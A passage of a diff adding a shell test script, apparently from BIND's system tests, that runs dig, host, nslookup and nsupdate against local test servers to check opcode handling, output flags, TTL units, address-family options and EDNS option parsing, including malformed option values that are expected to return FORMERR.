+# +if "$PERL" -e 'use Net::DNS; use Net::DNS::Packet; my $p = new Net::DNS::Packet; $p->header->opcode(5);' > /dev/null 2>&1 +then + checkupdate=1 +else + checkupdate=0 +fi + +if [ -x "$NSLOOKUP" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check nslookup handles UPDATE response ($n)" + ret=0 + "$NSLOOKUP" -q=CNAME "-port=$PORT" foo.bar 10.53.0.7 > nslookup.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" nslookup.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$HOST" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check host handles UPDATE response ($n)" + ret=0 + "$HOST" -t CNAME -p $PORT foo.bar 10.53.0.7 > host.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" host.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$NSUPDATE" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check nsupdate handles UPDATE response to QUERY ($n)" + ret=0 + res=0 + $NSUPDATE << EOF > nsupdate.out.test$n 2>&1 || res=$? 
+server 10.53.0.7 ${PORT} +add x.example.com 300 in a 1.2.3.4 +send +EOF + test $res -eq 1 || ret=1 + grep "invalid OPCODE in response to SOA query" nsupdate.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$DIG" ] ; then + + if [ $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check dig handles UPDATE response ($n)" + ret=0 + dig_with_opts @10.53.0.7 cname foo.bar > dig.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "Skipped UPDATE handling test" + fi + + n=$((n+1)) + echo_i "checking dig short form works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +short a a.example > dig.out.test$n || ret=1 + test "$(wc -l < dig.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig split width works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +split=4 -t sshfp foo.example > dig.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +unknownformat works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +unknownformat a a.example > dig.out.test$n || ret=1 + grep "CLASS1[ ][ ]*TYPE1[ ][ ]*\\\\# 4 0A000001" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "TYPE1" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig with reverse lookup works ($n)" + ret=0 + dig_with_opts @10.53.0.3 -x 127.0.0.1 > dig.out.test$n 2>&1 || ret=1 + # doesn't matter if has answer + grep -i "127\\.in-addr\\.arpa\\." 
< dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 86400 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig over TCP works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 a a.example > dig.out.test$n || ret=1 + grep "10\\.0\\.0\\.1$" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" dig.out.test$n > /dev/null && ret=1 + check_ttl_range dig.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +multi +norrcomments works for SOA (when default is rrcomments)($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t SOA example > dig.out.test$n || ret=1 + grep "; serial" dig.out.test$n > /dev/null && ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +rrcomments works for DNSKEY($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works for DNSKEY ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then 
echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +nosplit works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +nosplit DNSKEY example > dig.out.test$n || ret=1 + grep "$NOSPLIT" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID\$" < dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig multi flag is local($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +nomulti example +nomulti > dig.out.nn.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +multi example +nomulti > dig.out.mn.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +nomulti example +multi > dig.out.nm.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +multi example +multi > dig.out.mm.$n || ret=1 + lcnn=$(wc -l < dig.out.nn.$n) + lcmn=$(wc -l < dig.out.mn.$n) + lcnm=$(wc -l < dig.out.nm.$n) + lcmm=$(wc -l < dig.out.mm.$n) + test "$lcmm" -ge "$lcnm" || ret=1 + test "$lcmm" -ge "$lcmn" || ret=1 + test "$lcnm" -ge "$lcnn" || ret=1 + test "$lcmn" -ge "$lcnn" || ret=1 + check_ttl_range dig.out.nn.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.mn.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.nm.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.mm.$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +noheader-only works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +noheader-only A example > dig.out.test$n || ret=1 + grep "Got answer:" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i 
"failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID\$" < dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +header-only works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +header-only example > dig.out.test$n || ret=1 + grep "^;; flags: qr rd; QUERY: 0, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; QUESTION SECTION:" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +raflag works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +raflag +qr example > dig.out.test$n || ret=1 + grep "^;; flags: rd ra ad; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; flags: qr rd ra; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +tcflag works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +tcflag +qr example > dig.out.test$n || ret=1 + grep "^;; flags: tc rd ad; QUERY: 1, ANSWER: 0" < dig.out.test$n > /dev/null || ret=1 + grep "^;; flags: qr rd ra; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +header-only works (with class and type set) ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +header-only -c IN -t A example > dig.out.test$n || ret=1 + grep "^;; flags: qr rd; QUERY: 0, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; QUESTION SECTION:" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 
0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +zflag works, and that BIND properly ignores it ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +zflag +qr A example > dig.out.test$n || ret=1 + sed -n '/Sending:/,/Got answer:/p' dig.out.test$n | grep "^;; flags: rd ad; MBZ: 0x4;" > /dev/null || ret=1 + sed -n '/Got answer:/,/AUTHORITY SECTION:/p' dig.out.test$n | grep "^;; flags: qr rd ra; QUERY: 1" > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +qr +ednsopt=08 does not cause an INSIST failure ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=08 +qr a a.example > dig.out.test$n || ret=1 + grep "INSIST" < dig.out.test$n > /dev/null && ret=1 + grep "FORMERR" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ttlunits works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +ttlunits A weeks.example > dig.out.test$n || ret=1 + grep "^weeks.example. 3w" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A days.example > dig.out.test$n || ret=1 + grep "^days.example. 3d" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A hours.example > dig.out.test$n || ret=1 + grep "^hours.example. 3h" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A minutes.example > dig.out.test$n || ret=1 + grep "^minutes.example. 45m" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A seconds.example > dig.out.test$n || ret=1 + grep "^seconds.example. 
45s" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig respects precedence of options with +ttlunits ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +ttlunits +nottlid A weeks.example > dig.out.test$n || ret=1
+ grep "^weeks.example. IN" < dig.out.test$n > /dev/null || ret=1
+ dig_with_opts +tcp @10.53.0.2 +nottlid +ttlunits A weeks.example > dig.out.test$n || ret=1
+ grep "^weeks.example. 3w" < dig.out.test$n > /dev/null || ret=1
+ dig_with_opts +tcp @10.53.0.2 +nottlid +nottlunits A weeks.example > dig.out.test$n || ret=1
+ grep "^weeks.example. 1814400" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig preserves origin on TCP retries ($n)"
+ ret=0
+ # Ask ans4 to still accept TCP connections, but not respond to queries
+ echo "//" | sendcmd 10.53.0.4
+ dig_with_opts -d +tcp @10.53.0.4 +retry=1 +time=1 +domain=bar foo > dig.out.test$n 2>&1 && ret=1
+ test "$(grep -c "trying origin bar" dig.out.test$n)" -eq 2 || ret=1
+ grep "using root origin" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig -6 -4 ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 -4 -6 A a.example > dig.out.test$n 2>&1 && ret=1
+ grep "only one of -4 and -6 allowed" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig @IPv6addr -4 A a.example ($n)"
+ if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null
+ then
+ ret=0
+ dig_with_opts +tcp @fd92:7065:b8e:ffff::2 -4 A a.example > dig.out.test$n 2>&1 && ret=1
+ grep "address family not supported" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 unavailable; skipping"
+ fi
+
+ n=$((n+1))
+ echo_i 
"checking dig @IPv4addr -6 +mapped A a.example ($n)"
+ if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null && [ "$(uname -s)" != "OpenBSD" ]
+ then
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 -6 +mapped A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 or IPv4-to-IPv6 mapping unavailable; skipping"
+ fi
+
+ n=$((n+1))
+ echo_i "checking dig +tcp @IPv4addr -6 +nomapped A a.example ($n)"
+ if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null
+ then
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 -6 +nomapped A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 unavailable; skipping"
+ fi
+ n=$((n+1))
+
+ echo_i "checking dig +notcp @IPv4addr -6 +nomapped A a.example ($n)"
+ if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null
+ then
+ ret=0
+ dig_with_opts +notcp @10.53.0.2 -6 +nomapped A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 unavailable; skipping"
+ fi
+
+ n=$((n+1))
+ echo_i "checking dig +subnet ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +subnet=127.0.0.1 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "CLIENT-SUBNET: 127.0.0.1/32/0" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet +subnet ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +subnet=127.0.0.0 +subnet=127.0.0.1 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "CLIENT-SUBNET: 127.0.0.1/32/0" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ 
$ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet with various prefix lengths ($n)"
+ ret=0
+ for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24; do
+ dig_with_opts +tcp @10.53.0.2 +subnet=255.255.255.255/$i A a.example > dig.out.$i.test$n 2>&1 || ret=1
+ case $i in
+ 1|9|17) octet=128 ;;
+ 2|10|18) octet=192 ;;
+ 3|11|19) octet=224 ;;
+ 4|12|20) octet=240 ;;
+ 5|13|21) octet=248 ;;
+ 6|14|22) octet=252 ;;
+ 7|15|23) octet=254 ;;
+ 8|16|24) octet=255 ;;
+ esac
+ case $i in
+ 1|2|3|4|5|6|7|8) addr="${octet}.0.0.0";;
+ 9|10|11|12|13|14|15|16) addr="255.${octet}.0.0";;
+ 17|18|19|20|21|22|23|24) addr="255.255.${octet}.0" ;;
+ esac
+ grep "FORMERR" < dig.out.$i.test$n > /dev/null && ret=1
+ grep "CLIENT-SUBNET: $addr/$i/0" < dig.out.$i.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.$i.test$n "A" 300 || ret=1
+ done
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet=0/0 ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +subnet=0/0 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1
+ grep "CLIENT-SUBNET: 0.0.0.0/0/0" < dig.out.test$n > /dev/null || ret=1
+ grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet=0 ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +subnet=0 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1
+ grep "CLIENT-SUBNET: 0.0.0.0/0/0" < dig.out.test$n > /dev/null || ret=1
+ grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet=::/0 ($n)"
+ ret=0
+ dig_with_opts +tcp 
@10.53.0.2 +subnet=::/0 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1
+ grep "CLIENT-SUBNET: ::/0/0" < dig.out.test$n > /dev/null || ret=1
+ grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +ednsopt=8:00000000 (family=0, source=0, scope=0) ($n)"
+ ret=0
+ dig_with_opts +tcp @10.53.0.2 +ednsopt=8:00000000 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1
+ grep "CLIENT-SUBNET: 0/0/0" < dig.out.test$n > /dev/null || ret=1
+ grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +ednsopt=8:00030000 (family=3, source=0, scope=0) ($n)"
+ ret=0
+ dig_with_opts +qr +tcp @10.53.0.2 +ednsopt=8:00030000 A a.example > dig.out.test$n 2>&1 || ret=1
+ grep "status: FORMERR" < dig.out.test$n > /dev/null || ret=1
+ grep "CLIENT-SUBNET: 00 03 00 00" < dig.out.test$n > /dev/null || ret=1
+ test "$(grep -c "CLIENT-SUBNET: 00 03 00 00" dig.out.test$n)" -eq 1 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +subnet with prefix lengths between byte boundaries ($n)"
+ ret=0
+ for p in 9 10 11 12 13 14 15; do
+ dig_with_opts +tcp @10.53.0.2 +subnet=10.53/$p A a.example > dig.out.test.$p.$n 2>&1 || ret=1
+ grep "FORMERR" < dig.out.test.$p.$n > /dev/null && ret=1
+ grep "CLIENT-SUBNET.*/$p/0" < dig.out.test.$p.$n > /dev/null || ret=1
+ check_ttl_range dig.out.test.$p.$n "A" 300 || ret=1
+ done
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +sp works as an abbreviated form of split ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +sp=4 -t 
sshfp foo.example > dig.out.test$n || ret=1
+ grep " 9ABC DEF6 7890 " < dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "SSHFP" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig -c works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 -c CHAOS -t txt version.bind > dig.out.test$n || ret=1
+ grep "version.bind. 0 CH TXT" < dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +dscp ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +dscp=32 a a.example > /dev/null 2>&1 || ret=1
+ dig_with_opts @10.53.0.3 +dscp=-1 a a.example > /dev/null 2>&1 && ret=1
+ dig_with_opts @10.53.0.3 +dscp=64 a a.example > /dev/null 2>&1 && ret=1
+ #TODO add a check to make sure dig is actually setting the dscp on the query
+ #we might have to add better logging to named for this
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +ednsopt with option number ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=3 a.example > dig.out.test$n 2>&1 || ret=1
+ grep 'NSID: .* ("ns3")' dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking dig +ednsopt with option name ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=nsid a.example > dig.out.test$n 2>&1 || ret=1
+ grep 'NSID: .* ("ns3")' dig.out.test$n > /dev/null || ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking ednsopt LLQ prints as expected ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=llq:0001000200001234567812345678fefefefe +qr a.example > dig.out.test$n 2>&1 || ret=1
+ pat='LLQ: Version: 1, Opcode: 2, Error: 0, Identifier: 1311768465173141112, Lifetime: 4278124286$'
+ tr -d 
'\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that dig warns about .local queries ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 local soa > dig.out.test$n 2>&1 || ret=1
+ grep ";; WARNING: .local is reserved for Multicast DNS" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig processes +ednsopt=key-tag and FORMERR is returned ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=key-tag a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; KEY-TAG: *$" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig processes +ednsopt=key-tag:<value-list> ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=key-tag:00010002 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; KEY-TAG: 1, 2$" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null && ret=1
+ check_ttl_range dig.out.test$n "A" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig processes +ednsopt=key-tag:<malformed-value-list> and FORMERR is returned ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=key-tag:0001000201 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; KEY-TAG: 00 01 00 02 01" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig processes +ednsopt=client-tag:value ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=client-tag:0001 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; CLIENT-TAG: 1$" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null 
&& ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that FORMERR is returned for a too short client-tag ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=client-tag:01 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; CLIENT-TAG" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that FORMERR is returned for a too long client-tag ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=client-tag:000001 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; CLIENT-TAG" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig processes +ednsopt=server-tag:value ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=server-tag:0001 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; SERVER-TAG: 1$" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that FORMERR is returned for a too short server-tag ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=server-tag:01 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; SERVER-TAG" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that FORMERR is returned for a too long server-tag ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=server-tag:000001 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ grep "; SERVER-TAG" dig.out.test$n > /dev/null || ret=1
+ grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ 
n=$((n+1))
+ echo_i "check that Extended DNS Error 0 is printed correctly ($n)"
+ # First defined EDE code, additional text "foo".
+ dig_with_opts @10.53.0.3 +ednsopt=ede:0000666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1
+ pat='^; EDE: 0 (Other): (foo)$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that Extended DNS Error 24 is printed correctly ($n)"
+ # Last defined EDE code, no additional text.
+ dig_with_opts @10.53.0.3 +ednsopt=ede:0018 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ pat='^; EDE: 24 (Invalid Data)$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
